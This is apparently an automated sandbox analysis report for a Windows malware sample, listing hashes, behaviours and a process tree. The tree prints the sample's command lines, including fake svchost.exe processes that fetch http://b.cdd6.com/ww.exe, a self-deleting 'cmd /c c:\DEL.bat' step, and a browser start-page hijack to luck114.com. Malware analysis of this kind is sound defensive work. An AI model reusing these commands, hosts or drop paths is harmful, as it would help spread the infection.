Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
06/07/2024, 11:24
Static task
static1
Behavioral task
behavioral1
Sample
286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
Resource
win10v2004-20240704-en
General
-
Target
286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
-
Size
47KB
-
MD5
286094cfaaca44ec9db1e60f4fce1988
-
SHA1
64ca1a4cb8d74780821a7762c515ec8487563d99
-
SHA256
0358faf087cad9fd6ecf99491130c0fd1f699c3793a62d7ebfdfcacee60922e9
-
SHA512
5b87b98b3121866bfe5948772ef39b89f66f5907168496d98beb9c98ddff4c3aed199c71a3a477877f11ee7b25a12e9b3ec69e6e033262c3b0a69a377e441a3e
-
SSDEEP
768:ut2SmxfGgix9rKevJjrr/qT/u9/1g2bCo2KPYJ/ukJV9HNFjNE2D8Lb/Ot72B2S:o2Deg5m/qbKXeo2AsugV9tFJE2gLbWkl
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\Drivers\Atieccx.sys cmdd -
Deletes itself 1 IoCs
pid Process 2068 cmd.exe -
Executes dropped EXE 20 IoCs
pid Process 428 363safe.exe 768 svchost.exe 2712 svchost.exe 2988 svchost.exe 2640 svchost.exe 1744 cmdd 2512 svchost.exe 3008 svchost.exe 1760 svchost.exe 2380 svchost.exe 1720 svchost.exe 1528 svchost.exe 840 svchost.exe 1772 svchost.exe 2320 svchost.exe 2600 svchost.exe 1844 svchost.exe 2432 svchost.exe 2920 svchost.exe 1300 svchost.exe -
Loads dropped DLL 64 IoCs
pid Process 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 428 363safe.exe 428 363safe.exe 768 svchost.exe 768 svchost.exe 2720 WerFault.exe 2720 WerFault.exe 2720 WerFault.exe 768 svchost.exe 2752 WerFault.exe 2752 WerFault.exe 2752 WerFault.exe 768 svchost.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 768 svchost.exe 2948 WerFault.exe 2948 WerFault.exe 2948 WerFault.exe 2552 svchost.exe 768 svchost.exe 2340 WerFault.exe 2340 WerFault.exe 2340 WerFault.exe 768 svchost.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 768 svchost.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 768 svchost.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 768 svchost.exe 2016 WerFault.exe 2016 WerFault.exe 2016 WerFault.exe 768 svchost.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 768 svchost.exe 2508 WerFault.exe 2508 WerFault.exe 2508 WerFault.exe 768 svchost.exe 2396 WerFault.exe 2396 WerFault.exe 2396 WerFault.exe 768 svchost.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 768 svchost.exe 2252 WerFault.exe 2252 WerFault.exe 2252 WerFault.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\msfcsg.dll 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe File created C:\Windows\SysWOW64\363safe.exe 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2160 set thread context of 2552 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 44 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Downloaded Program Files\svchost.exe svchost.exe File created C:\Windows\Fonts\cmdd 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe File created C:\Windows\Fonts\svchost.exe 363safe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 17 IoCs
pid pid_target Process procid_target 2720 2712 WerFault.exe 31 2752 2988 WerFault.exe 34 2148 2640 WerFault.exe 37 2948 2512 WerFault.exe 41 2340 3008 WerFault.exe 47 1676 1760 WerFault.exe 50 2372 2380 WerFault.exe 53 920 1720 WerFault.exe 56 2016 1528 WerFault.exe 59 652 840 WerFault.exe 62 2508 1772 WerFault.exe 65 2396 2320 WerFault.exe 68 2116 2600 WerFault.exe 71 2252 1844 WerFault.exe 74 2940 2432 WerFault.exe 77 2068 2920 WerFault.exe 80 2220 1300 WerFault.exe 83 -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://luck114.com" 363safe.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 428 363safe.exe 768 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 476 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2160 wrote to memory of 428 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 29 PID 2160 wrote to memory of 428 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 29 PID 2160 wrote to memory of 428 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 29 PID 2160 wrote to memory of 428 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 29 PID 428 wrote to memory of 768 428 363safe.exe 30 PID 428 wrote to memory of 768 428 363safe.exe 30 PID 428 wrote to memory of 768 428 363safe.exe 30 PID 428 wrote to memory of 768 428 363safe.exe 30 PID 768 wrote to memory of 2712 768 svchost.exe 31 PID 768 wrote to memory of 2712 768 svchost.exe 31 PID 768 wrote to memory of 2712 768 svchost.exe 31 PID 768 wrote to memory of 2712 768 svchost.exe 31 PID 2712 wrote to memory of 2720 2712 svchost.exe 33 PID 2712 wrote to memory of 2720 2712 svchost.exe 33 PID 2712 wrote to memory of 2720 2712 svchost.exe 33 PID 2712 wrote to memory of 2720 2712 svchost.exe 33 PID 768 wrote to memory of 2988 768 svchost.exe 34 PID 768 wrote to memory of 2988 768 svchost.exe 34 PID 768 wrote to memory of 2988 768 svchost.exe 34 PID 768 wrote to memory of 2988 768 svchost.exe 34 PID 2988 wrote to memory of 2752 2988 svchost.exe 36 PID 2988 wrote to memory of 2752 2988 svchost.exe 36 PID 2988 wrote to memory of 2752 2988 svchost.exe 36 PID 2988 wrote to memory of 2752 2988 svchost.exe 36 PID 768 wrote to memory of 2640 768 svchost.exe 37 PID 768 wrote to memory of 2640 768 svchost.exe 37 PID 768 wrote to memory of 2640 768 svchost.exe 37 PID 768 wrote to memory of 2640 768 svchost.exe 37 PID 2640 wrote to memory of 2148 2640 svchost.exe 39 PID 2640 wrote to memory of 2148 2640 svchost.exe 39 PID 2640 wrote to memory of 2148 2640 svchost.exe 39 PID 2640 wrote to memory of 2148 2640 svchost.exe 39 PID 2160 wrote to memory of 1744 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 40 PID 2160 wrote to memory of 1744 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 40 PID 2160 wrote to memory of 1744 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 40 PID 2160 wrote to memory of 1744 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 40 PID 768 wrote to memory of 2512 768 svchost.exe 41 PID 768 wrote to memory of 2512 768 svchost.exe 41 PID 768 wrote to memory of 2512 768 svchost.exe 41 PID 768 wrote to memory of 2512 768 svchost.exe 41 PID 2512 wrote to memory of 2948 2512 svchost.exe 43 PID 2512 wrote to memory of 2948 2512 svchost.exe 43 PID 2512 wrote to memory of 2948 2512 svchost.exe 43 PID 2512 wrote to memory of 2948 2512 svchost.exe 43 PID 2160 wrote to memory of 2552 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 44 PID 2160 wrote to memory of 2552 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 44 PID 2160 wrote to memory of 2552 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 44 PID 2160 wrote to memory of 2552 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 44 PID 2160 wrote to memory of 2552 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 44 PID 2160 wrote to memory of 2068 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 45 PID 2160 wrote to memory of 2068 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 45 PID 2160 wrote to memory of 2068 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 45 PID 2160 wrote to memory of 2068 2160 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe 45 PID 768 wrote to memory of 3008 768 svchost.exe 47 PID 768 wrote to memory of 3008 768 svchost.exe 47 PID 768 wrote to memory of 3008 768 svchost.exe 47 PID 768 wrote to memory of 3008 768 svchost.exe 47 PID 3008 wrote to memory of 2340 3008 svchost.exe 49 PID 3008 wrote to memory of 2340 3008 svchost.exe 49 PID 3008 wrote to memory of 2340 3008 svchost.exe 49 PID 3008 wrote to memory of 2340 3008 svchost.exe 49 PID 768 wrote to memory of 1760 768 svchost.exe 50 PID 768 wrote to memory of 1760 768 svchost.exe 50 PID 768 wrote to memory of 1760 768 svchost.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\363safe.exeC:\Windows\system32\363safe.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Internet Explorer start page
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\Fonts\svchost.exeC:\Windows\Fonts\svchost.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.1 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2720
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.2 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2752
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.3 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2148
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.4 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2948
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.5 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2340
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.6 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:1760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 845⤵
- Loads dropped DLL
- Program crash
PID:1676
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.7 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:2380 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2372
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.8 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:1720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 845⤵
- Loads dropped DLL
- Program crash
PID:920
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.9 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:1528 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2016
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.10 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 845⤵
- Loads dropped DLL
- Program crash
PID:652
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.11 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:1772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2508
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.12 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:2320 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2396
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.13 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:2600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2116
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.14 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:1844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 845⤵
- Loads dropped DLL
- Program crash
PID:2252
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.15 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 845⤵
- Program crash
PID:2940
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.16 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:2920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 845⤵
- Program crash
PID:2068
-
-
-
C:\Windows\Downloaded Program Files\svchost.exe"C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.17 http://b.cdd6.com/ww.exe4⤵
- Executes dropped EXE
PID:1300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 845⤵
- Program crash
PID:2220
-
-
-
-
-
C:\Windows\Fonts\cmddC:\Windows\Fonts\cmdd2⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:1744
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Loads dropped DLL
PID:2552
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\DEL.bat2⤵
- Deletes itself
PID:2068
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
210B
MD508ba533e7bb46bca4c4cd117073af9c7
SHA1c2d7983ae7310436a3a2bab3d8d5367a02f004bd
SHA25632f4763f3c9a3972d90bde6af847c6493a26a6f40a60d8ebdfa35dcb582d7a28
SHA5122d5e3465b9327ffb089a377c412338bb05ba0cdbe960aa1725e85d3e830b79137d1c756b8906cdbcead8097fd833eb10e09531aa3c3a40deb281b7078ab26ce4
-
Filesize
3KB
MD5d2c3349a566a814a3d793f82ad7d8a65
SHA166f23c6633b21702b3ea3a936358907ca35a593e
SHA256c4bab8beb591701e6fc5b33dea445e05a02703432d88ca90d47e2c5a46e68e23
SHA51298a8621d2c23853299f1210f626a14500b746995582d34ef362e87b7d5ae172a4ef40356b9a61ff6e1deed53c2f76d79d8c6563ecce161bde2c58bbc66d2b1ef
-
Filesize
12KB
MD588d3a74e8f8d13584d908e8fd0f74531
SHA1b53ddb537ba839be6190fc89cba17ca3a8234da0
SHA2563115b1b7ef40b1e8980e673035fd150c778b5925e011e20f199772728176fbde
SHA512bc6257420bdcd4e0d96f789c17b9adc212a30f4d0fbbeb818b64fd6c76272f4d73aa166c29d51bc047b1b4c22e5eaaea00760a1f055cc809c076d4b7e6a000c7
-
Filesize
13KB
MD53ad8a2755c0c9b6ca3be26fe1f4dd473
SHA161d342c456861ff6f15a217d7e133b55de2c2b98
SHA256057b6f8547660960b795734cdd63ac9100254c5691f6785cefead4b337c56dc8
SHA512562ca318aaeb7662e109c47430259a8a59e6a5e514cbc0c234375865592d886fe973f26799ddcd79b1140a0fe66d0e9f0a992c3b6048840b0a9f7d8d3fd057a1
-
Filesize
14KB
MD5e1dda20f3fdfa4d95c9353e06dedf5af
SHA1fc4b588837abb6b96d56f932eba3cd6d2baddd1f
SHA25666baf9065e615cc4b2ea191e1d777091bf072d140a8fd5444f2c5ff8569bad71
SHA5124f9edf8cf6411a483539b48616c8027bb7e01d9be194ac12324ee5fd636aef781abec31b00013cea5584267cab7db3da4a21552007a379ba0edcf5410e965fb8
-
Filesize
18KB
MD5f31c6c4c922c0eefd7ddfbb68308f14c
SHA10d2a64ff26f3d87896afe35a52353b2357ffd496
SHA25600fcd3086ece3ed2fadea655e86992a722a79e88f8954a44d4a9ba370c629f55
SHA5128974c66987c2e88e8d0c87b246d498e1f4fbbbc33378860eb58b9b01a95e32f525142edb15e7e90bf985a9a7f695f194b50f2e8453ce2cece6ea33def9ef7522